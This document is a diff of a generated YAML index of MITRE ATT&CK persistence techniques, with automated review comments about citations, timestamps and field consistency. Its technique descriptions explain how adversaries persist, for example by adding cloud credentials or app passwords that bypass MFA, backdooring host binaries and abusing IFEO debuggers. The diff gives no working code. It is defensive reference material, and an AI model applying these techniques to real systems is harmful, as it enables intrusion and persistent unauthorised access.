Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31029,8 +31442,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31061,7 +31472,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31096,12 +31507,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31178,7 +31587,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31232,7 +31640,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31264,7 +31671,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31294,55 +31701,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
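Review bot: the 40-odd removed lines here (platforms, domains, marking, id, created, and the full `external_references` list) are re-emitted lower in the T1137.001 object in a later hunk, so this is key reordering rather than deletion; but the removed list contained `GlobalDotName Jun 2019`, `CrowdStrike Outlook Forms` and `Outlook Today Home Page`, and `GlobalDotName Jun 2019` is cited from the `x_mitre_detection` text that follows. Confirm all three survive in the re-added list, otherwise `(Citation: GlobalDotName Jun 2019)` dangles. Also visible in context: the `name:` value ends with a stray period (`Office Template Macros.`), which no other `name:` in this patch has.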
@@ -31373,6 +31735,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31382,9 +31745,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
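Review bot: the `x_mitre_version` bump from '1.1' to '1.2' in this hunk coincides only with `x_mitre_platforms` being populated (Windows, Office Suite) and `x_mitre_domains` being added; the removed `x_mitre_modified_by_ref` is re-added at the end of the object and no description text for T1137.001 changes anywhere in this diff. The platform name 'Office Suite' matches the consolidation applied to T1136.003 and T1098 later in the diff, so the change is consistent; worth confirming the bump is the upstream object's own version and not an artefact of regeneration.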
@@ -31392,11 +31759,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
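Review bot: `x_mitre_permissions_required` (User, Administrator) is removed from T1137.001 in this hunk with nothing replacing it, while the same field is kept as context for T1547.015 and T1205.001 further down this diff. If the regenerated source no longer carries the field, the remaining techniques should lose it in the same change; otherwise anyone filtering this index on required permissions gets inconsistent results across techniques. A smaller point in the re-added references: the 'Hexacorn Office Template Macros' entry dates the post 'April 17' while its URL path says 2017/04/19; the mismatch is carried over verbatim from the removed copy and could be fixed at the source.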
@@ -31428,7 +31831,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
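Review bot: the `modified` timestamp for T1546.009 moves backwards here, from 2022-04-25 to 2020-11-10. The same backwards move recurs for T1547.015, T1205.001, T1556.008, T1546.014 and T1574.010 in this diff, and in every case the old value is one of a handful of shared stamps (2022-04-25T14:00:00.188Z, 2022-05-11T14:00:00.188Z, 2023-05-09T14:00:00.188Z, 2023-10-31T14:00:00.188Z), all at exactly 14:00:00.188Z, which looks like a bulk value from an earlier import rather than a real edit date. Confirm that the new values come from the upstream STIX objects, and that nothing downstream orders or caches on `modified` in a way that a decreasing value would break.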
@@ -31476,13 +31879,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
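Review bot: T1546.009 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` in this hunk and no `x_mitre_attack_spec_version` is added back, whereas T1137.001 earlier in this diff gets `x_mitre_attack_spec_version: 3.2.0` in its regenerated object; the same unreplaced removal happens for T1547.015 and T1205.001 below. If the upstream objects for these three techniques genuinely lack the field, fine, but it is worth checking, since the rest of the file now carries a spec version and these entries would be the odd ones out.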
@@ -31495,16 +31896,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31516,16 +31917,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
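Review bot: the platform list for T1098.005 drops both Azure AD and SaaS in favour of Identity Provider, which matches the consolidation applied to T1098.001, T1136.003 and T1098 later in this diff, so the change is consistent. Dropping SaaS does narrow the stated scope, though: the description (visible in the previous hunk) still says devices 'may be registered in a multifactor authentication (MFA) system', which need not be an identity provider, so anyone filtering this index on SaaS will no longer see the technique. Confirm that is the intended reading before merging.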
@@ -31580,7 +31981,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31641,7 +32041,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31717,7 +32116,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
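Review bot: the T1547.015 description in context shows `SMLoginItemSetEnabled` ending one line with the closing `.` alone on the next, which is what an inline-code span looks like after its markup is stripped; the same artefact appears in the T1546.014 and T1547.006 descriptions in this diff, so whatever converts the upstream description text into this YAML is dropping the code delimiters and the whitespace around them. Separately, the `modified` value here moves backwards (2022-04-25 to 2021-10-18), following the pattern noted for T1546.009.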
@@ -31745,8 +32144,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31772,7 +32169,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31797,23 +32194,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
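Review bot: the six-line rewrap of the T1098.001 description hides a one-phrase change, 'in Azure AD' becoming 'in Azure / Entra ID'; everything else in the `-`/`+` block is identical text at different line breaks, so a reviewer has to read all twelve lines to find it. Since the YAML is generated, consider emitting descriptions as block scalars (`|-`), as T1554 and T1547.006 already are in this file, so that reflows stop swamping the diff. The citation key 'Demystifying Azure AD Service Principals' is correctly left unchanged, as it is a reference key rather than prose.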
@@ -31823,11 +32218,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
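Review bot: the new CreateLoginProfile sentence cites 'Permiso Scattered Spider 2023' and 'Lacework AI Resource Hijacking 2024', and both keys are added to `external_references` in the reference hunks below, so the citations resolve. One wording point: 'add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](...)' reads as if the dashboard were the destination; 'log into the AWS Management Console (i.e. [Cloud Service Dashboard](...))' would make clear that the link names the related technique, matching how '(i.e. [Cloud Accounts](...))' is used two sentences later.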
@@ -31838,12 +32237,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
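Review bot: the new app-password paragraph spells out 'multi-factor authentication (MFA)' while the T1098.005 description earlier in this diff uses 'multifactor authentication (MFA)'; pick one form for the file. The two new citation keys ('Mandiant APT42 Operations 2024', 'Microsoft Entra ID App Passwords') are both defined in the reference hunks below, so they resolve. The relocation of `x_mitre_attack_spec_version: 3.2.0` to just after `kill_chain_phases` is pure key reordering in a YAML map and needs no review.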
@@ -31852,6 +32258,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
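Review bot: the visible `x_mitre_detection` text still names only Service Principal/Application modifications and APIs that create or import SSH keys, while the description in this diff gained two new credential paths with clear detection consequences: AWS CreateLoginProfile (a console password added to an existing principal) and Entra ID app passwords, which bypass MFA and survive a primary password reset. Suggest adding a sentence on monitoring CreateLoginProfile calls in CloudTrail-style API logs and app password creation events in Entra ID audit logs next to the existing guidance, so detection keeps pace with the description.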
@@ -31860,13 +32267,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
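Review bot: two 'Active Directory' data sources are added to T1098.001 even though the new description material concerns Entra ID app passwords and AWS CreateLoginProfile; the same 'Active Directory: Active Directory Object Creation' source is already listed for T1098.005 (device registration in Entra ID) earlier in this diff, so this appears to be how Entra ID directory-object changes are represented here. If so, a short pointer in the detection text to Entra ID audit events for credential and app-password changes would make the mapping usable; otherwise the added data sources look unrelated to the described change.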
@@ -31892,10 +32302,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
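Review bot: the new 'Lacework AI Resource Hijacking 2024' entry puts the title before the author ('Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.'), whereas every other entry in this list is author-first ('Google. (n.d.). gcloud compute os-login ssh-keys add.', 'Ian Ahl. (2023, September 20). LUCR-3: ...'); 'Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts.' would match. Also visible in context: the 'Blue Cloud of Death Video' entry credits 'Kunz, Bruce' while the 'Blue Cloud of Death' entry in the next hunk credits 'Kunz, Bryce' for the same talk; one of the two is a typo and both are carried over unchanged.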
@@ -31904,10 +32322,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31924,14 +32352,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32006,7 +32431,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32095,24 +32519,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
